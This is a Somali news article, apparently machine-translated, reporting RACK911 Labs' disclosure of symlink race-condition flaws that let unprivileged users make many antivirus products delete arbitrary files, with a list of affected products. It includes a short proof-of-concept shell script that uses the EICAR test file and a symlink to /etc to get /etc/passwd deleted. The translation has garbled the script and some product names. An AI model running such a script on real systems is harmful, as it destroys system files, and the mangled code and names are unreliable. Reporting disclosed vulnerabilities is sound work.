Cilmi-baarayaal ka socda RACK911 Labs in ku dhawaad dhammaan xirmooyinka fayraska ee Windows, Linux iyo macOS ay u nuglaadeen weerarrada lagu maamulayo xaaladaha jinsiyadda inta lagu gudajiro tirtirka faylalka lagu arkay malware-ka.
Si aad weerar u qaaddo, waxaad u baahan tahay inaad geliso fayl uu antivirus-ku u aqoonsan yahay inuu yahay xaasidnimo (tusaale, waxaad isticmaali kartaa saxeex tijaabo ah), iyo waqti go'an ka dib, ka dib markii fayraska uu ogaado faylka xaasidnimada ah, laakiin isla markiiba ka hor inta aanad wicin shaqada. Si aad u tirtirto, ku beddel buugga hagaha faylka oo leh xiriir calaamad ah. Daaqadaha, si loo gaaro saameyn isku mid ah, beddelka hagaha waxaa lagu sameeyaa iyadoo la adeegsanayo isku xirka hagaha. Dhibaatadu waxay tahay in ku dhawaad dhammaan anti-virus-yadu aysan si sax ah u hubin xiriiriyeyaasha astaanta ah, iyagoo aaminsan inay tirtirayaan fayl xaasidnimo ah, waxay tirtireen faylka ku jira tusaha kaas oo xiriiriyaha calaamaduhu tilmaamayo.
Linux iyo macOS waxaa lagu tusayaa sida habkan isticmaalaha aan mudnaanta lahayn uu u tirtiri karo /etc/passwd ama fayl kasta oo nidaam ah, iyo gudaha Windows maktabadda DDL ee antivirus lafteeda si ay u xannibto shaqadeeda (Windows weerarku wuxuu ku xaddidan yahay oo keliya in la tirtiro). faylasha aan hadda isticmaalin codsiyada kale). Tusaale ahaan, weeraryahanku waxa uu samayn karaa tusaha “ka faa’iidayso” oo uu soo geliyo faylka EpSecApiLib.dll oo wata saxeexa fayraska ee tijaabada ah, ka dibna waxa uu ku beddeli karaa buugga “ka faa’iidaysiga” xidhiidhka “C:\Program Files (x86)\McAfee Ammaanka Endpoint\Endpoint Security ka hor inta aan la tirtirin Platform", taas oo horseedi doonta in laga saaro maktabadda EpSecApiLib.dll liiska antivirus. Linux iyo macOS, khiyaano la mid ah ayaa la samayn karaa iyadoo lagu beddelayo hagaha isku xirka "/ iwm".
#! / bin / sh
rm -rf /guri/user/ka faa'iidaysi; mkdir /guri/isticmaal/ka faa'iidayso/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
halka inotifywait -m "/guri/user/ka faa'iidayso/passwd" | grep -m 5 "FURAN"
do
rm -rf /guri/user/ka faa'iidaysi; ln -s /etc /home/user/exploit
soo gabagabeeyay
Intaa waxaa dheer, barnaamijyo badan oo ka hortag ah oo loogu talagalay Linux iyo macOS ayaa la ogaaday inay isticmaalaan magacyada faylka la saadaalin karo marka ay la shaqeynayaan faylalka ku meel gaarka ah ee / tmp iyo / gaarka / tmp, kuwaas oo loo isticmaali karo in lagu kordhiyo mudnaanta isticmaalaha xididka.
Ilaa hadda, dhibaatooyinka ayaa horeyba u hagaajiyay alaab-qeybiyeyaasha badankood, laakiin waxaa xusid mudan in ogeysiisyadii ugu horreeyay ee dhibaatada loo diray soo-saareyaasha dayrta 2018. In kasta oo aanay iibiyeyaasha oo dhami aanay soo saarin wax cusub, haddana waxa la siiyay ugu yaraan 6 bilood in ay ku dhejiyaan, RACK911 Labs-na waxa ay rumaysan tahay in ay hadda xor u tahay in ay shaaciso dayacanka. Waxaa la xusay in RACK911 Labs ay ka shaqeyneysay sidii loo aqoonsan lahaa dayacanka muddo dheer, laakiin ma aysan fileynin inay aad u adag tahay in lala shaqeeyo asxaabta ka socota warshadaha antivirus sababtoo ah dib u dhac ku yimaada sii deynta cusbooneysiinta iyo iska indhatirka baahida loo qabo in si degdeg ah loo hagaajiyo amniga dhibaatooyinka.
Alaabooyinka ay saameeyeen (xirmada ka hortagga bilaashka ah ee ClamAV kuma jiraan liiska):
- Linux
- BitDefender GravityZone
- Amniga dhamaadka Comodo
- Amniga Server-ka Eset
- F-Sugida Amniga Linux
- Amniga Kaspersy Endpoint
- Amniga Amniga ee loo yaqaan 'McAfee Endpoint Security'
- Sophos Anti-Virus ee Linux
- Windows
- Fayraska 'Avast Free Anti-Virus'
- Fayras-ka-hortagga Avira ee Bilaashka ah
- BitDefender GravityZone
- Amniga dhamaadka Comodo
- F-Sugida Kumbuyuutarka
- Amniga Goobta FireEye
- Dhexgalka X (Sophos)
- Amniga Kaspersky Endpoint
- Malwarebytes ee Windows
- Amniga Amniga ee loo yaqaan 'McAfee Endpoint Security'
- Qubbada Panda
- Meel kasto Webroot Secure
- macOS
- CCN
- BitDefender Wadarta Amniga
- Amniga Eset Cyber
- Kaspersky Internet Security
- Ilaalinta Guud ee McAfee
- Difaaca Microsoft (BETA)
- Norton Security
- Sophos Home
- Meel kasto Webroot Secure
Source: opennet.ru